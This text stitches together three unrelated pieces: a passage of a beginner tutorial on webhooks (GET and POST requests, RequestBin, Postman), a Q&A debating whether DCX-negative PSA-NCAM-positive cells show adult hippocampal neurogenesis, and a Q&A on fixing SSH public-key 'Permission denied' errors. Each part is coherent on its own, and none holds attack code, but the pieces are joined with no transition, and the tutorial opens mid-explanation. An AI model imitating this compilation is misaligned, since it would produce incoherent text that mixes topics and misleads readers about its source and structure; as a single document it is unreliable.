In other words, the customer's order is written out as a string of key=value pairs. Now we need to send that message to the invoicing app. The simplest way to send data to a webhook URL is with an HTTP GET request: literally appending the data to the URL and pinging the URL (or typing it into your browser's address bar). Just as you can open a page by typing its address, your applications can send each other messages by tacking extra text onto the end of a web address after a question mark. The complete GET request for the order is just the invoicing app's webhook URL with the serialized order appended.

Deep inside the invoicing app, it's a "your mail has arrived!" moment: a new invoice is created for Bob's $10 paper order, and the app springs into action. That's a working webhook.

Remember when you had to check your email to see if there were any new messages? And remember how much nicer push email felt ("You've got mail!")? That's what webhooks are for your apps. Instead of repeatedly checking for new information, the apps push data to each other when something happens, so no one wastes time checking and waiting.

Ready to use webhooks? Skip ahead, or read on for the most common terms used with webhooks.

That was the simple version. Technically, a webhook is "a custom call made over HTTP", according to Jeff Lindsay, one of the first people to conceptualize webhooks. Webhooks are data and executable commands sent from one application to another over HTTP, serialized in XML, JSON, or form-encoded format. They're called webhooks because they are software hooks (code that runs when something happens) that work over the web. And they are usually secured through obscurity: each user of an application gets a unique, random URL to send webhook data to. Optionally, they can also be protected with a key or signature.

Webhooks are most commonly used to connect two different applications.
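Returning to the GET-style delivery described above, here is a sketch in Python; the webhook URL is the hypothetical invoicing-app address from the example, not a real endpoint.

```python
from urllib.parse import urlencode

# Placeholder webhook URL for the invoicing app (from the example above)
webhook_url = "https://yourapp.com/data/12345"
order = {"customer": "Bob", "item": "paper", "total": "10.00"}

# "Sending" data with GET means appending it after a question mark
full_url = webhook_url + "?" + urlencode(order)
print(full_url)
# https://yourapp.com/data/12345?customer=Bob&item=paper&total=10.00

# Pinging this URL, e.g. urllib.request.urlopen(full_url), would deliver
# the order; the invoicing app parses everything after the "?".
```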
When an event occurs in the trigger app, it serializes the event's data and sends it to a webhook URL in the action app, the app you want to act on that data. The action app can then send a callback, often just an HTTP status code, to acknowledge receipt.

Webhooks are similar to APIs, but simpler. An API is a complete language for an application, with functions or calls to add, edit, and retrieve data. The difference is that with an API you have to do the work yourself: if you build an app that uses an API to connect to another app, your app must ask the other app for new data whenever it needs it. Webhooks, on the other hand, are built for one specific part of an application, and they're automated. An app might offer a webhook just for new contacts; whenever a new contact is added, the app automatically pushes the data to the other app's webhook URL. It's a simple one-to-one connection that runs on its own.

You now know the terminology: how apps can send messages to each other using webhooks, and what serialized data means. You can talk about webhooks. Time to use them.

The best way to understand how webhooks work is to test them: make your own webhook requests and see what happens. Or just drop a webhook URL into an app to share data; after all, you don't need to know how to build a webhook in order to use one.

The fastest way to learn is to experiment, and it's best to experiment with something you can't break. There are two great tools for that: RequestBin (owned by Pipedream) and Postman. RequestBin lets you create a webhook URL and send data to it to see how it is received. Go to RequestBin, click Create RequestBin, and copy the URL it provides. (You'll need a Pipedream account, created with Google or GitHub, to view and use the URL.) Now serialize some data in form-encoded style, or just copy the example above. Open a new tab, paste the RequestBin URL into the address bar, and type a question mark.
Finally, paste in your serialized data and load the URL. Refresh the RequestBin tab and you'll see the data it received, listed for inspection.

If you prefer, you can use RequestBin's sample code to send POST requests from your terminal or from your own application code. It's a bit more involved, but it lets you use JSON or XML encoding.

Or use another app. Postman lets you make custom HTTP requests, so you can easily send custom data to a webhook URL. Enter the URL, select the HTTP request method (GET, POST, PUT, etc.), and add the body data. You can send detailed requests to webhook URLs without writing much code.

Testing webhooks and hand-serializing data is still about as tedious as copying and pasting data between your apps. So let's skip both and have the apps talk to each other directly. As an example, we'll use the WordPress-based form tool Gravity Forms and the document template builder WebMerge.
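As an aside on the code route mentioned above with RequestBin's sample code: a rough equivalent using only Python's standard library looks like this. The URL below is a placeholder, not a real RequestBin; paste in the one RequestBin actually gives you.

```python
import json
import urllib.request

# Placeholder URL; replace with the one RequestBin provides
webhook_url = "https://requestbin.example/abc123"

order = {"customer": "Bob", "item": "paper", "total": 10.0}
req = urllib.request.Request(
    webhook_url,
    data=json.dumps(order).encode("utf-8"),  # JSON instead of form encoding
    headers={"Content-Type": "application/json"},
    method="POST",
)
# urllib.request.urlopen(req) would send it; RequestBin then displays
# exactly the body and headers it received.
```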
Are $DCX^{-}PSA-NCAM^{+}$ neurons the result of adult neurogenesis in humans?

A recent study by Sorrells et al. (2018) has stirred a debate over whether humans really have adult neurogenesis in the hippocampus. In a follow-up paper, "Adult hippocampal neurogenesis: a coming-of-age story," H.G. Kuhn, T. Toda, and F.H. Gage criticized the original study: while Sorrells et al. counted $DCX^{+}PSA-NCAM^{+}$ cells as adult-born neurons, they did not count $DCX^{-}PSA-NCAM^{+}$ cells as such, on the grounds that the latter exhibited more mature morphological features under their criteria. However, the developmental time course of adult-born neurons in the human dentate gyrus has not been clearly characterized, and neurons in higher mammals take at least six months to fully mature (Kohler et al., 2011).

My question is: are the $DCX^{-}PSA-NCAM^{+}$ neurons really the result of adult neurogenesis, as claimed in the second paper? Or are Sorrells et al. correct in calling only those neurons adult-born that are positive for both markers (DCX, PSA-NCAM)?

Comment: What answer are you looking for beyond what's in those papers? I.e., why do you think they've overlooked something that is settled in the field, rather than there simply being disagreement? One of them is advocating a more stringent criterion; that's it.

Reply: @bryankrause The authors of the two papers are making contradictory claims, each supported with reasons. One side claims the markers can give false positives by identifying glial cells as newborn neurons; the other claims otherwise. I'd like the opinions of others on this disagreement, with arguments, facts, and perhaps links to sources, to help me understand the situation more clearly.
Right, and that is the purpose of the commentary by Kuhn et al.: they note that Sorrells et al. are being more conservative than previous work in their definitions, and that "the developmental time course of adult-born neurons in the human dentate gyrus has not been clearly characterized." In other words, if Sorrells et al.'s criteria are right, their conclusion is right; if their criteria are wrong, their conclusion is wrong. It's hard to do these studies because there aren't many human brains available to chop up. Kuhn et al. aren't claiming "otherwise"; they are claiming "unclear." Similarly, Sorrells et al. aren't claiming the markers "do give false positives"; they're claiming they "could." Uncertainty is normal at the edges of knowledge; if it weren't, those wouldn't be the edges.
Question: Whenever I try to ssh to my server it fails with:

Permission denied (publickey,password,keyboard-interactive).

I can ssh to another machine from the same client without any problem, so the client side seems OK. I'm logging in as root from a Windows machine under Cygwin (whose home directory is /home/Administrator). The "publickey" part troubles me, as I take it this refers to RSA/DSA keypair authentication. Where else should I look?

Answer: A few common causes:

- Permissions. Your home directory, the .ssh directory, and the authorized_keys file have strict permission requirements: sshd refuses public-key authentication if any of them is group- or world-writable. Typical working modes are 755 (or stricter) on the home directory, 700 on ~/.ssh, and 600 on ~/.ssh/authorized_keys.

- Key location. Check that /etc/ssh/sshd_config on the server has the line "AuthorizedKeysFile %h/.ssh/authorized_keys". Note that it's the sshd_config file, not the ssh_config file, that matters here. After changing sshd_config settings, restart the daemon (service sshd restart).

- Encrypted home directories. If your home directory is encrypted, it isn't mounted until after you log in, so sshd can't read ~/.ssh/authorized_keys during authentication. One poster fixed this exact failure by moving the authorized_keys file outside the encrypted home directory and pointing AuthorizedKeysFile at the new location.

- Keyboard-interactive. The "keyboard-interactive" method is controlled by ChallengeResponseAuthentication in sshd_config; when it is set to no, sshd disables keyboard-interactive logins.

The exact reason for the login failure will be in the server's auth log. Also note that for permission and ownership checks, only the group's numeric ID counts, not its name.
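For the permissions fix specifically, this is the usual chmod 700 on ~/.ssh and chmod 600 on authorized_keys, sketched here as a small Python helper (the function name is ours, for illustration):

```python
import os
import stat

# OpenSSH (with the default StrictModes yes) refuses public-key auth when
# ~/.ssh or authorized_keys is group- or world-writable.
# Expected modes: ~/.ssh -> 700, authorized_keys -> 600.
def tighten_ssh_perms(home):
    ssh_dir = os.path.join(home, ".ssh")
    auth_keys = os.path.join(ssh_dir, "authorized_keys")
    os.chmod(ssh_dir, 0o700)    # drwx------
    os.chmod(auth_keys, 0o600)  # -rw-------
    # Return the resulting permission bits for verification
    return (
        stat.S_IMODE(os.stat(ssh_dir).st_mode),
        stat.S_IMODE(os.stat(auth_keys).st_mode),
    )
```

The home directory itself should also be no looser than 755; sshd checks the whole chain up from authorized_keys.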